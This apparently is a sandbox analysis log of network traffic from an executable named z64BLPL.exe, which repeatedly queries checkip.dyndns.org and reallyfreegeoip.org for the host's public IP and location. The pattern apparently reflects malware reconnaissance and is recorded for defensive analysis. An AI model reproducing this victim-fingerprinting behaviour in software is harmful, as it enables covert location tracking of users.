Sep 26, 2024 17:10:35.905607939 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 26 Sep 2024 15:10:35 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 5becb1b1d69e925157ce1b7151665f46 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 26, 2024 17:10:35.905626059 CEST	745	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 26 Sep 2024 15:10:35 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive X-Request-ID: 5becb1b1d69e925157ce1b7151665f46 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 26, 2024 17:10:35.914891958 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:36.537620068 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6ade4b43f45e41e5490a246ce552b552 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:37.171185017 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:38.807979107 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a7929405bb8b11a95f0e2445e09cbff5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:39.484121084 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:42.134253025 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ea9005855a802d4269fa06a83c6685ff Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:42.941111088 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:43.617235899 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:43 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7d23390bf25184e6e408f7fa0372a01f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	193.122.6.168	80	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 17:10:44.334860086 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 17:10:45.045376062 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bf5679f5f4ece92c3e946b2f495bf6c3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:00 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:00 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28232 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xvfy2qThdfV1SX9jyqVV%2FzHx6yD%2BvFuiP%2FZa41EOFQwb21WO7p9Fa%2FBCANiP8uMdvz0W5YZrc7ND4OKQxJME33ueUIBOeZvLCAahGBF9gyL4%2FAqi4LZ1IsBPrD8PcWYZhiQTz86B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942da379a78ce8-EWR
2024-09-26 15:10:00 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:01 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 15:10:01 UTC	686	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28233 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlnZwIbTz%2FH%2F223Fpesev%2Fqe%2FvjD6UCP3PtjoZ%2FPo6CNitOQqHcNEl0BTJB609BKRtuo2SgatQMwOt0vCCh4NB%2FdAdSs7%2FDXrhOdwK8zj%2BXIWeRC50kkWNobBo4dvRtFvs9tftjE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942da90f2c80dc-EWR
2024-09-26 15:10:01 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:31 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28263 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZ1Rvk7gr2kSwFhQzCELoahKJvjhT9pPUSQDRImm%2FSPCnGwaSWomxDBZToEQ%2FQRBNeSyuK7O9in2dd8ljisigFdpfuN2gW2iO1a4BQdfIqKTAqrKTmFjNK%2Fo%2FZ%2BnE0oUn%2FTLcsHo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942e6908850f3e-EWR
2024-09-26 15:10:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:37 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28269 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruHl9lAifKFH5tilS%2F0ibisu1xP02zZ6eB8atw0rcwp96Pqu1T%2FgEDlXUgiRMIS%2FQwZpGDJ4OdcI9UvTNicn5BhKHq5MbErWM%2FNKIDzc2HBrlyNo%2BYJhMhuzM6lXNhNA3KlmVhx5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942e89d8797291-EWR
2024-09-26 15:10:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:39 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:39 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:39 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28271 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8QFo8rvPzcJVhDhRxDElhzPz7ybj4nwxDS2It2JSxZKAFGIOSIZjO1kpy7tuFIJrFkdFpzl00wk%2FeQ%2BYy3w6FJKrp3yBiLHwhL0gAbn2RgPPt33KFCdllu%2BKsxL8NzFMkJygJdd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942e984820436f-EWR
2024-09-26 15:10:39 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:42 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:42 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:42 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28274 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMpsPJjTOCodTtFeeQgcq%2B0yp7RaPlALxgVB3%2FaF9CJeMR%2FkTZN%2FHDfX8ReVrqO74ho8zbKSXwfRZWePnGcST1IQgthN2hjMlnYLDBKUWIB2DKsSBx8QzhtV9WM4ZStyPaMneKJQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942ead5f45c328-EWR
2024-09-26 15:10:42 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:44 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:44 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:44 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28276 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOpXHubcwSKPWNOY%2FVxCywn2nALRpDuAMgRaExmAViYEmuS%2BWgBZfNUIhwymDmc3LxWDbo4d8CgSaPsIw5RU5NK3%2F1fCdQ9XFVsDbB9MX83i7dXT1lWO2Iw3k2D9ktpEtSsvBCsm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942eb69c4e4375-EWR
